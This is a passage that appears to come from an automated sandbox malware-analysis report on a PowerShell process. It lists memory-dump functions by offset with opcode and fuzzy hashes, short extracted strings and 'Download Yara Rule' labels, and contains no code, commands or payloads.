Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 454f0def420a2845aaae6ea317600cfbe2a7e8b0faec44a2af13c9eb6d62a0b2
Instruction ID: a82a7f9365c154ef69c7f0ffd6a663434f07899fbe65b649492e4be4b7893ade
Opcode Fuzzy Hash: 454f0def420a2845aaae6ea317600cfbe2a7e8b0faec44a2af13c9eb6d62a0b2
Instruction Fuzzy Hash: 45E0EC70D4520CDFCB80EFBCD5496ADBBF4BB18201F1050E9A90993290EB755A44CB51

Function 06C0B598 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23be5e5f934979ca95f333705ccb6d3ff588f30704f18ba88229f6ad53fb1a72
Instruction ID: dcbe1d491d6bf2e4515afc4502687762ec2da2864f16a1ec1b10464bb4855123
Opcode Fuzzy Hash: 23be5e5f934979ca95f333705ccb6d3ff588f30704f18ba88229f6ad53fb1a72
Instruction Fuzzy Hash: 92E0C238D09208DBC744DFA4E5409ACBBB8EB45300F1080DCD80813381CA329E42CF80

Function 06C033E9 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b2181f90d30f7db1b17ad99623a7ada09c98e0fe22877862966c6f428092dfa
Instruction ID: e6f02a99beb4a9d89fbd31af236a11caac3aa92111b33f5c975062538c556deb
Opcode Fuzzy Hash: 3b2181f90d30f7db1b17ad99623a7ada09c98e0fe22877862966c6f428092dfa
Instruction Fuzzy Hash: AAD0176188E3C45FC79367F858292D93F20CF17214F0A0ADAE4898A4A3C968154ACB33

Function 06C605C8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454975305.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 998515500df113a8f8de7878a4ef9c839eab71a537a68a5e95fe86c83088da4a
Instruction ID: dcbe43984426c24de39e1115dcbc99b9a35c1166bd6560e3f66e2737e86c9ad2
Opcode Fuzzy Hash: 998515500df113a8f8de7878a4ef9c839eab71a537a68a5e95fe86c83088da4a
Instruction Fuzzy Hash: 8FE0C234E09208DBC744DFA5E6805ACBBB8EB45300F2080DCE84823341CA319E42CB88

Function 06C61138 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454975305.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 998515500df113a8f8de7878a4ef9c839eab71a537a68a5e95fe86c83088da4a
Instruction ID: 3e0a4140d4ff726c51683ba632fd12729e79ece355cc1af9db589e4068da7f06
Opcode Fuzzy Hash: 998515500df113a8f8de7878a4ef9c839eab71a537a68a5e95fe86c83088da4a
Instruction Fuzzy Hash: 10E0C274E09208DBCB44DFA8E9805ACBBB9EB55301F1490ECE80813341CA319E42DB84

Function 008E1A08 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2422970271.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16ee0cd62bae3cbface4ec738cad04804a3daedb5ba942c3c75afd5780a7ed40
Instruction ID: 63d1a34f76c31f837e634627affe95bce000e0ef08f92959c5f69a20e1e75b6b
Opcode Fuzzy Hash: 16ee0cd62bae3cbface4ec738cad04804a3daedb5ba942c3c75afd5780a7ed40
Instruction Fuzzy Hash: 8CE02DB4D0531E9F8B44EFBA95451AEFBF5FB49200F14C5AAD829E3301E63456128F91

Function 06BD4DF2 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6350bf6d6a11dbf6ca77aa6b9869a9b1d6d1a54e6d17d547e1eda275f2aabd90
Instruction ID: 0017ca7b77c891658bce58accd32a4d83e9f800cda8039b2e6b5b2f845624ee6
Opcode Fuzzy Hash: 6350bf6d6a11dbf6ca77aa6b9869a9b1d6d1a54e6d17d547e1eda275f2aabd90
Instruction Fuzzy Hash: 81D067D7C9E7D11FE31296705C752657F61AB37601F4A05DB8E908B1D3A1191438C397

Function 008EF6F0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2422970271.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 314e9dc2e020780117cefb4c705000a6fd918cca8d464b8ec3fa8a60db5b516f
Instruction ID: 126a964accaee45f1943ce1dab317391d2a66085183efa50d808fcfbba04e284
Opcode Fuzzy Hash: 314e9dc2e020780117cefb4c705000a6fd918cca8d464b8ec3fa8a60db5b516f
Instruction Fuzzy Hash: 76E0E270D11358EFCB44EFB8954469DBBB5EB05201F2044E9D80892340EA359A84CB81

Function 00AF731A Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2424167969.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_af0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42467780a75fe8251c63d41312f2688649b356adc2bebfa86b9facfafc865a1a
Instruction ID: 3e0557279c96ce919b8a5d6b9ecd1944abd086ea099b1b4f450380c4ca924632
Opcode Fuzzy Hash: 42467780a75fe8251c63d41312f2688649b356adc2bebfa86b9facfafc865a1a
Instruction Fuzzy Hash: D3D017392103588F83049B68E4484A9BBE9FB89330310879AF8AB476A0CA346C01CBC8

Function 00AF7328 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2424167969.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_af0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eaa46059a4e9dce6614a4658508f231248767710ab7f88e666d5b91e85c4aec3
Instruction ID: be39b643f26c7bfd639e50de1d4a44391efa4c9445d0c2f96e7535b59b5db540
Opcode Fuzzy Hash: eaa46059a4e9dce6614a4658508f231248767710ab7f88e666d5b91e85c4aec3
Instruction Fuzzy Hash: C1D092392103688B86149A59E449856BBE9FB8D31171086AAE84B83720DA71BC01CBC8

Function 008E1A2F Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2422970271.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0af53281e6a841602f0261826a06b9c6f27b3c074ae96c10bc9f7591957b71d8
Instruction ID: b645402aa62683afbe7e48a7f51f4245e4159d409e87166282728ec2d4eacc36
Opcode Fuzzy Hash: 0af53281e6a841602f0261826a06b9c6f27b3c074ae96c10bc9f7591957b71d8
Instruction Fuzzy Hash: DFD0A730C0021ECBCF00CFD4D04D4BDB774FB41305F104069E90A91641CB380552CF92

Function 06C033F8 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d6aeb8cfe96668b2d23f1dacd1fd312bf2add555f7f76daa1124e25b2a75260
Instruction ID: aa4354f3ce659877f2d6c0594c5f4d7e871708e4b4bdf6cd4a794f1b3ff24afd
Opcode Fuzzy Hash: 4d6aeb8cfe96668b2d23f1dacd1fd312bf2add555f7f76daa1124e25b2a75260
Instruction Fuzzy Hash: D0C08C7090228C42D1C477E866093293B68DB41215F040498B50C024928E784084C97B

Function 06C47A78 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 720ac5b8597862b4576a0e1ff63d4c510fc06e3f8ba9ea741ee683650a347da6
Instruction ID: 9fac1b3ea14084d94f028c2a7bf02bb2871d51829a4259c44c3abdde3a6a0b3e
Opcode Fuzzy Hash: 720ac5b8597862b4576a0e1ff63d4c510fc06e3f8ba9ea741ee683650a347da6
Instruction Fuzzy Hash: 66C00276E5001A9A8B00DAD9E4508DCB774EB94321B004026D214A6104D63115268B50

Non-executed Functions

Function 06C035E0 Relevance: 7.2, Strings: 5, Instructions: 956COMMON

Download Yara Rule

Strings

xbaq, xrefs: 06C0370D
TJcq, xrefs: 06C03782
Te^q, xrefs: 06C03D03
Ednc, xrefs: 06C039C7
pbq, xrefs: 06C0419A

Memory Dump Source

Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd

Similarity

API ID:
String ID: Ednc$TJcq$Te^q$pbq$xbaq
API String ID: 0-2085530446
Opcode ID: 7c3a3d3ca88e26e398a08f47004268d3e2f4c33bebd2912cf7e3ed448107d986
Instruction ID: f59f8f17ab3d5b029b73c384c3f9406bfb5ab9de69064ae8690ebca07be5bc23
Opcode Fuzzy Hash: 7c3a3d3ca88e26e398a08f47004268d3e2f4c33bebd2912cf7e3ed448107d986
Instruction Fuzzy Hash: 79A2A575A00228DFDB64CF69C984A99BBB2FF89304F1581D9E50DAB365DB319E81CF40

Function 06C035D1 Relevance: 4.0, Strings: 3, Instructions: 244COMMON

Download Yara Rule

Strings

xbaq, xrefs: 06C0370D
TJcq, xrefs: 06C03782
Te^q, xrefs: 06C03D03

Memory Dump Source

Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd

Similarity

API ID:
String ID: TJcq$Te^q$xbaq
API String ID: 0-3225726259
Opcode ID: e356627992c39d3ade45a9a9dfeae5842ce9d2d228f0b1f970da59ebc0d1cdcf
Instruction ID: eefa4dbe75c257cf4946f9c17533dbacfee8371654c22b1411bfd49388c499a0
Opcode Fuzzy Hash: e356627992c39d3ade45a9a9dfeae5842ce9d2d228f0b1f970da59ebc0d1cdcf
Instruction Fuzzy Hash: DFC14675E016588FDB58DF6AC944ADDBBF2BF89300F14C1AAD809AB365DB305A81CF50

Function 06C05878 Relevance: 3.8, Strings: 2, Instructions: 1335COMMON

Download Yara Rule

Strings

2, xrefs: 06C06856
$^q, xrefs: 06C05EDA

Memory Dump Source

Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd

Similarity

API ID:
String ID: 2$$^q
API String ID: 0-1071376767
Opcode ID: b38c50261d06de068930ef1e10d98999d59ebab6c5af7a751eb083e78505fc89
Instruction ID: cd7127063ccb7c893c555d60d674de11250615f76668f82469f83ffe18c9b043
Opcode Fuzzy Hash: b38c50261d06de068930ef1e10d98999d59ebab6c5af7a751eb083e78505fc89
Instruction Fuzzy Hash: D8E2F574E042288FEB64DF69D984B9ABBF1FB89301F1081E9E509A7395DB345E81CF50

Function 06C19A90 Relevance: 3.1, Strings: 2, Instructions: 618COMMON

Download Yara Rule

Strings

fcq, xrefs: 06C19BBD
8, xrefs: 06C19BAA

Memory Dump Source

Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd

Similarity

API ID:
String ID: fcq$8
API String ID: 0-89531850
Opcode ID: 1a26d0d3c44d33990626afac3a8d5a0bc0d283aec3185ac14be56b5d6242d712
Instruction ID: 46f14f539980cdb158f0d23aa55363b8b08c17cc89573867d99c43ddfdcd6394
Opcode Fuzzy Hash: 1a26d0d3c44d33990626afac3a8d5a0bc0d283aec3185ac14be56b5d6242d712
Instruction Fuzzy Hash: B352D775D05229CFDBA4DF69C950AD9B7B2FB89310F1082EAD509A7354DB30AE81CF90

Function 06BD4988 Relevance: 2.8, Strings: 2, Instructions: 328COMMON

Download Yara Rule

Strings

,bq, xrefs: 06BD4A7E
(bq, xrefs: 06BD4D2C

Memory Dump Source

Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd

Similarity

API ID:
String ID: (bq$,bq
API String ID: 0-1616511919
Opcode ID: 3c840572385a90e017317aaa1a505b16d46e0e53b8d75290daeda1900381b09a
Instruction ID: ff7a8ecb7093c33be0d36fb089ead8e79a29b4258f494149354442fed7cb36da
Opcode Fuzzy Hash: 3c840572385a90e017317aaa1a505b16d46e0e53b8d75290daeda1900381b09a
Instruction Fuzzy Hash: E9D11B74A005088FDB54DF69C584A6EBBF2FF88711F6585A9E805AF365EB30EC81CB50

Function 008E1F08 Relevance: 2.7, Strings: 2, Instructions: 174COMMON

Download Yara Rule

Strings

4'^q, xrefs: 008E1FCF
4'^q, xrefs: 008E1FFA

Memory Dump Source

Source File: 00000004.00000002.2422970271.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 7ad3f254a31f10b0fdad6c8a4cc296804ea25e9d16005dd10e0be44f62af467b
Instruction ID: 2c6267ca763acb9eb3fe0d911c1171a94880779b71f58b389e3c638a463e7c79
Opcode Fuzzy Hash: 7ad3f254a31f10b0fdad6c8a4cc296804ea25e9d16005dd10e0be44f62af467b
Instruction Fuzzy Hash: 3571EA71E042089FEB08DFBAE69169ABFF2EBC9300F14C669D0459B365EF7459068F50

Function 008E1F18 Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

4'^q, xrefs: 008E1FCF
4'^q, xrefs: 008E1FFA

Memory Dump Source

Source File: 00000004.00000002.2422970271.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8e0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 1696263b4a738e08d1525cf6fad87bd39d9693785d254c4344acbe13f8e40a67
Instruction ID: 052060a846b0a02017acb96c3528bb995494cf279bf8fe4066bfac11f8412adc
Opcode Fuzzy Hash: 1696263b4a738e08d1525cf6fad87bd39d9693785d254c4344acbe13f8e40a67
Instruction Fuzzy Hash: E771FB70E042088FEB08DFAAEB9169ABBF2FBC8300F14C269D0059B365EF3459058F50

Function 06C19A8F Relevance: 2.7, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

fcq, xrefs: 06C19BBD
h, xrefs: 06C19B9E

Memory Dump Source

Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd

Similarity

API ID:
String ID: fcq$h
API String ID: 0-1849521214
Opcode ID: 4c45cfa99e238db67129d0287984f97cb2ddb20792ea91b22ac457681bc4e81b
Instruction ID: e367924e6a1f9c178f3d8e62c29488036235cdebcb4c2e8dc91e84d5a6eff2fa
Opcode Fuzzy Hash: 4c45cfa99e238db67129d0287984f97cb2ddb20792ea91b22ac457681bc4e81b
Instruction Fuzzy Hash: 46712971E00228CFEB64DF6AC950AD9B7B2FF89300F1082AAD509A7350DB345E85CF91

Function 06BE2E58 Relevance: 1.9, Strings: 1, Instructions: 602COMMON

Download Yara Rule

Strings

(bq, xrefs: 06BE2F28

Memory Dump Source

Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: dbd04a79b596b7c9f204bcfccd45ae470b2ee5776fa4b19618c50cba24737d00
Instruction ID: 67cb86eb397cf99ed60e3bd317b53941592c8f8e6d17d40b15c5324e4c80ee1f
Opcode Fuzzy Hash: dbd04a79b596b7c9f204bcfccd45ae470b2ee5776fa4b19618c50cba24737d00
Instruction Fuzzy Hash: 6D327AB1B006158FCB59DFA9C894A6EFBF2FF88300F248569D55AD7391DB34A901CB90

Function 06C0E6F8 Relevance: 1.7, Strings: 1, Instructions: 437COMMON

Download Yara Rule

Strings

Te^q, xrefs: 06C0EA81

Memory Dump Source

Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 157d2a930ce55c6f483b290d8e54e9a8f539bc361e58b2ad14e12a96d98f8586
Instruction ID: 288e578301a9b0efe6c69ea3eaa82be9206f32b5386d167bdc9f85df1161ec43
Opcode Fuzzy Hash: 157d2a930ce55c6f483b290d8e54e9a8f539bc361e58b2ad14e12a96d98f8586
Instruction Fuzzy Hash: 60121770A45218CFEB64DF69D944BA9BBF2FB8D300F1085AAE409A7395DB345E81CF50

Function 06C46160 Relevance: 1.7, Strings: 1, Instructions: 431COMMON

Download Yara Rule

Strings

Ednc, xrefs: 06C4641E

Memory Dump Source

Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd

Similarity

API ID:
String ID: Ednc
API String ID: 0-3985990180
Opcode ID: 44af466a3d5820c720a2ba32c59c8b488ef97a495881ba4ba72b19a82bf28c50
Instruction ID: c6c1f68ae21d57f42abd126f0c10ffe0434142cd29fbaa85e01e7364f899577b
Opcode Fuzzy Hash: 44af466a3d5820c720a2ba32c59c8b488ef97a495881ba4ba72b19a82bf28c50
Instruction Fuzzy Hash: 5512B370E006588FDB54DFAAC98069DFBF2BF89304F24C169D419EB21ADB34A946CF54

Function 06BD0006 Relevance: 1.5, Strings: 1, Instructions: 284COMMON

Download Yara Rule

Strings

Te^q, xrefs: 06BD00CF

Memory Dump Source

Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 0900f62bfe7908bc58d57527eca3803e5918902489128a1d8e756a18b2683434
Instruction ID: 0ed0386012890d0c722f0e91f64c479205e2ef42ae9fbda5e08b37d229a6c67f
Opcode Fuzzy Hash: 0900f62bfe7908bc58d57527eca3803e5918902489128a1d8e756a18b2683434
Instruction Fuzzy Hash: 2CC149B0E05218CFEB64DFA9D944B9DBBF2FB89304F1081A9E408AB351EB745985CF40

Function 06C48028 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

D, xrefs: 06C4926F

Memory Dump Source

Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: 36b1adf922191185c79cbebe4f4a912edaf1538acc06dfc5ec793867bae3220d
Instruction ID: 616f6c6a4805e9983b8a3109a683fae564cbec1ebaa2517126049c68aaeffb88
Opcode Fuzzy Hash: 36b1adf922191185c79cbebe4f4a912edaf1538acc06dfc5ec793867bae3220d
Instruction Fuzzy Hash: D0415A71E016588FEB58DF6BCD4479EFAF3AFC9201F14C1BA941CAA255DB344A868F01

Function 06C40006 Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

(, xrefs: 06C4010F

Memory Dump Source

Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: ef1e3db529e433769687fb225321c1790b07e86b9e231d3755497ed6ec8d6640
Instruction ID: b62b7a3912113b5cf43d129782eb98b8aea225a42b9c6165363c01dda557ed89
Opcode Fuzzy Hash: ef1e3db529e433769687fb225321c1790b07e86b9e231d3755497ed6ec8d6640
Instruction Fuzzy Hash: 3741AD71D057588FD75ACF2B8C40289BBF7AFCA200F19C0EAD5489B265DB744A4ACF11

Function 06C40040 Relevance: 1.3, Strings: 1, Instructions: 74COMMON

Download Yara Rule

Strings

L, xrefs: 06C4204C

Memory Dump Source

Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd

Similarity

API ID:
String ID: L
API String ID: 0-2909332022
Opcode ID: e6b89ed7b645a71c74decfdc6a51a6abf0e18c446897ebcd2955f1feb33955c8
Instruction ID: fc3a2628fc22cfbad9998e3bee54736f273031453cc8795485dfc09bb08a3c62
Opcode Fuzzy Hash: e6b89ed7b645a71c74decfdc6a51a6abf0e18c446897ebcd2955f1feb33955c8
Instruction Fuzzy Hash: A9319DB1E056188FEB5DDF6B8C4129AFAFBAFC9304F04D0FA954CA6215DB7406858F10

Function 06BEFA40 Relevance: .3, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d35f9436477670f28ba965770170e02abfd5e5f2469ff73b3c6e506fa37acf0
Instruction ID: e69f262d3b3c004836f76cb26f668afdf169a37b9b6879b385fb084850dd0d9b
Opcode Fuzzy Hash: 9d35f9436477670f28ba965770170e02abfd5e5f2469ff73b3c6e506fa37acf0
Instruction Fuzzy Hash: 8BD16EB0E05208CFEB54DFA9C944BADBBF6FB89301F1091A9E509AB391DB345985CF40

Function 06BEFA33 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf710da73981b03ba940ebf7ed984404f5128044455f7a63c6efc981c1032f40
Instruction ID: ce41b2a948907955707b255c5ce023c18b4d674c19dd41e95e42d10b910d8b54
Opcode Fuzzy Hash: cf710da73981b03ba940ebf7ed984404f5128044455f7a63c6efc981c1032f40
Instruction Fuzzy Hash: 75D15DB4E05208CFEB54DFA8D954BADBBF2FB89305F1081A9E509AB391DB345985CF40

Function 06C60CD0 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454975305.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 516a32531cae1e5b49218011a62ce7386fdb8f462d040371b6a79850f6ca6254
Instruction ID: 17d54e8d29741eba0a93aa4195b17cae57161ee45ad0bc43e48454e706ce7206
Opcode Fuzzy Hash: 516a32531cae1e5b49218011a62ce7386fdb8f462d040371b6a79850f6ca6254
Instruction Fuzzy Hash: 20A13A70A04208CFEB84DFAAD694BADBBF2FB89301F108229E505B73A1DB745945CF54

Function 06C60CE0 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454975305.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c60000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41198c6aa3903c0550b113b833660aa1a94c893a6a879a5c716640493e521834
Instruction ID: f8f0201e320198cbec53075cd8b371e740c534748b7f50b2d07ad7cf9d076fbb
Opcode Fuzzy Hash: 41198c6aa3903c0550b113b833660aa1a94c893a6a879a5c716640493e521834
Instruction Fuzzy Hash: E8A13D70A04208CFEB84DFAAD694BADBBF2FB89301F508229F505B72A1DB745945CF54

Function 06BE67C8 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f0c9b00273bc897bafe2584f565c5ff79efec30940cc6783d3a870b19a656e5
Instruction ID: 4b0091069a9a6db87dd89ada04a3bdc993025ce4a648c3d98a4d9065312d7f4c
Opcode Fuzzy Hash: 9f0c9b00273bc897bafe2584f565c5ff79efec30940cc6783d3a870b19a656e5
Instruction Fuzzy Hash: D6516CB4D16208CFEB54CFA9D544BEDBBF2FBAA300F10916AE409A7291E7345946CF40

Function 06BE67D8 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a821d13ef29547fecfa2952793666d9e1e5432cf8b868b54261daf1041203f4d
Instruction ID: e18acb5a970c7befc2a7e443cfea0f168758a000239e7078d1cc1260cafbcd43
Opcode Fuzzy Hash: a821d13ef29547fecfa2952793666d9e1e5432cf8b868b54261daf1041203f4d
Instruction Fuzzy Hash: BF5169B4D16208CFEB44DFA9D644BADBBF2FBAA301F10916AE409A7351EB345941CF40

Function 06C46150 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84642cf58472ce5761406e2023e6ec4f6733a66d838ed80a8ad1e2a447e02403
Instruction ID: 9e837b59074228c8c3e69826b939340230852126addecf0ce1d7f911deb58633
Opcode Fuzzy Hash: 84642cf58472ce5761406e2023e6ec4f6733a66d838ed80a8ad1e2a447e02403
Instruction Fuzzy Hash: F9518671E016189BDB58DFABD94059EFBF3AFC9300F14C16AD848AB225EB7059468F50

Function 06C05868 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72a610ef5c80a53869eb2c03bb9f393709f7f18be8c8c9a2a0e15fcd3219ea10
